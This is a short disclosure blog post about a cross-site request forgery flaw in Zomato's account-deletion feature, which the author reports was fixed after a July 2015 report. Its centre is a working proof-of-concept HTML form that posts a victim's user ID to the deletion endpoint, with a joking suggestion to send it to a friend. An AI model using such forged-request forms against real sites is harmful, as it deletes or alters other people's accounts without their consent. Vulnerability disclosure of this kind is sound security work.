Hi, friends :D,
Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.
I was catched by it soi was messing around with zomato now while checking out the settings section i found the “delete my account ” option and after clicking on that a prompt will occur like this
Now to delete the account you have to type delete inside it and confirm! but there was a flaw there was no csrf token available to validate the request!.
What is CSRF TOKEN ?
CSRF token is a protective measure used to prevent cross site request forgery attacks which checks that the request is coming from the legitimate user or not !
Now Exploitation Part
I created a quick working code which allows you to delete the any user’s account so now to delete his or her account you just need to send this code via html or as a link. 😛
<form action=”https://www.zomato.com/php/delete_user_profile.php method=”POST”>
<input type=”hidden” name=”reason” value=”woot woot”>
<input type=”hidden” name=”userid” value=”[User ID to whom you wanna delete]”>
<input type=”submit” value=”Submit request”>
Video Poc :
save this as delete.html and send this to your friend!
it was easy to grab any user ==>userid by just visiting their profile and copy that user id. Which increased it severity 😉
Fixing Time line:
[+] July 21, 2015 Reported to Support team
[+] Bug Fixed by team .
Let #internet be #safer place 🙂